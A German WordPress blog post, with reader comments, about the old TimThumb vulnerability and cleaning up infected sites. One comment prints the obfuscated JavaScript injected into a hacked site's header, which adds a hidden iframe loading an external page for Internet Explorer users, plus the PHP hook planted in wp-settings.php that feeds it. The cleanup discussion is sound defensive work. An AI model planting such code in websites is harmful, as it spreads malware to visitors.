WordPress & Webwork

WordPress: alte TimThumb-Version mit kritischer Sicherheitslücke in vielen Instalationen aktiv

TimThumb-Logo Über die kritische Sicherheitslücke im TimThimb habe ich im August 2011 berichtet. Bei TimThumb handelt es sich um eine Anwendung, die Bilder verkleinern, zuschneiden und Vorschaubilder erstellen kann. Mit der Version 2.0 wurde die Sicherheitslücke geschlossen, es existieren aber noch sehr viele Weblogs, die die alte Version aktiv haben und die dadurch entstandene Sicherheitslücke wurde in den letzten tagen massiv ausgenutzt:

Wer Hilfe bei der suche und der Entfernung der Sicherheitslücke braucht, der findet auf WordPress.org eine Erweiterung mit dem Namen Timthumb Vulnerability Scanner. Auf jeden Fall sollte man bei der Suche nicht nur nach timthumb.php sondern evtl. auch nach einer thumb.php suchen.

11 Reaktion(en)

  1. David Decker

    Vollkommen richtig, der erneute Hinweis auf diese unschöne Sache!

    Wichtig ist es auch, alle PLUGINS (also nicht nur Themes) zu untersuchen, denn auch da gibt es viele, die das Script verwendeten bzw. dies immer noch tun. – Längst noch nicht alle Entwickler/ Anbieter haben auf die neue Scriptversion 2.x aktualisiert!

    Meines Erachtens ist der Einsatz des Scripts – welches zwar in V2.x sehr gut ist – nicht notwendig. Es ist halt nur sehr bequem für Entwickler dies zu nehmen, anstelle die WordPress-API für Bilder zu implementieren, die eigentlich sehr leistungsfähig ist.

    Jeder Anwender/ Webmaster sollte seine Webseite checken und auch recherchieren, was verwendete Themes und Plugins betrifft!

  2. Klausi

    Wichtig ist es auch andere Software wie z.B. Templates und Erweiterungen von Joomla! & Co. auf die TimThumb-Schwachstelle hin zu untersuchen. Bei Themes von RocketTheme bspw. ist die Schwachstelle bis heute enthalten und trotz Mahnung an die Entwickler immer noch nicht bei allen – vor allem älteren Themes – gefixt!

  3. Pingback: Server Downtimes und keine Erklärung in Sicht « Kau-Boys blog

  4. djmaki

    Kann es sein dass durch diesen folgender Code im Header ausgegeben wird:

    eval(function(p,a,c,k,e,d) usw.
    (ich will hier nicht den ganzen code posten)

    Wegen diesem code bin ich überhaupt erst darafu gekommen, dass irgendwo vielleicht etwas nicht stimmt.
    Leider findet man dazu nicht viel.

    TimThumb ist upgedatet. Code weiterhin da

  5. djmaki

    Update:
    Habe auf dem server alles mit "thumb" entfernt. Templates gelöscht, plugins deaktiviert. Standart template von wordpress hoch.

    Auf dem server war noch eine alte joomla installatione. Ebenfalls gelöscht.
    Den ganzen server nochmal nach "thumb" untersucht, nichts gefunden (außer dem Plugin für das timthumb script scanner).

    Der code ist auch weiterhin im header bereich.

  6. djmaki

    LÖSUNG:

    OK, ob es was mit dem TimThumb Script zu tun hat, weiß ich immer noch nicht.
    Nachdem ich obige Schritte (kommentar nr. 3+4) gemacht habe, war der schadcode noch immer im header bereich (Google hat mich daruaf hingewiesen dass meine WordPress Seite Schadcode verbreitet).

    eval(function(p,a,c,k,e,d){e=function(c){return(c35?String.fromCharCode(c+29):c.toString(36))};if(!''.replace(/^/,String)){while(c--){d[e(c)]=k[c]||e(c)}k=[function(e){return d[e]}];e=function(){return'\w+'};c=1};while(c--){if(k[c]){p=p.replace(new RegExp('\b'+e(c)+'\b','g'),k[c])}}return p}('i 9(){a=6.h('b');7(!a){5 0=6.j('k');6.g.l(0);0.n='b';0.4.d='8';0.4.c='8';0.4.e='f';0.m='w://z.o.B/C.D?t=E'}}5 2=A.x.q();7(((2.3("p")!=-1&&2.3("r")==-1&&2.3("s")==-1))&&2.3("v")!=-1){5 t=u("9()",y)}',41,41,'el||ua|indexOf|style|var|document|if|1px|
    MakeFrameEx|element|yahoo_api|height|width|display|none|body|
    getElementById|function|createElement|iframe|appendChild|src|
    id|nl|msie|toLowerCase|opera|webtv||setTimeout|windows|http|
    userAgent|1000|gfsgsaf|navigator|ai|showthread|php|72241732'.
    split('|'),0,{}))

    Wer sich mit dem auskennt kann die seite ja gerne mal besuchen, die da geladen wird 🙂

    Um den Code zu entfernen muss im der wp-settings.php folgende funktion entfernt werden:

    function check_wordpress(){
    $t_d = sys_get_temp_dir();
    if(file_exists($t_d . ‘/wp_inc’)){
    readfile($t_d . ‘/wp_inc’);
    }
    }
    add_action(‘wp_head’, ‘check_wordpress’);

    do_action( ‘init’ );

    Diese gehört da definitiv nicht rein! befindet sich fast am Ende der wp-settings.php

    Damit ist der Quellcode wieder sauber.

    Das einzige was offen bleibt: Aus welchem "temp" Ordner holt er sich die Infos ?
    Kennt jemand wp temp ordner? ich habe leider keine gefunden.

    Vielleicht kann Perun hier noch was beisteuern.

  7. Pingback: Henning Uhle | Wordpress: Massenhafte Verbreitung von Schadcode

  8. Pingback: Erste Hilfe für den WordPress Blog-Hack » BlogProfis.de

  9. Pingback: Wie man WordPress-Blogs nach der TimThumb-Sicherheitslücke durchsucht | Support-Ing Martin Ihde

  10. Pingback: WordPress: TimThumb-Sicherheitslücke immer noch im Umlauf | WordPress & Webwork

Die Kommentare in diesem Beitrag sind geschlossen.

WordPress-Schulungs­unter­lagen

Anleitung für Autoren und Redakteure
Schneller und unkomplizierter Einstieg in die redaktionelle Betreuung einer WordPress-Installation.

Handbuch für Administratoren
Schneller und unkomplizierter Einstieg in die technische Betreuung einer WordPress-Installation.

Anschauen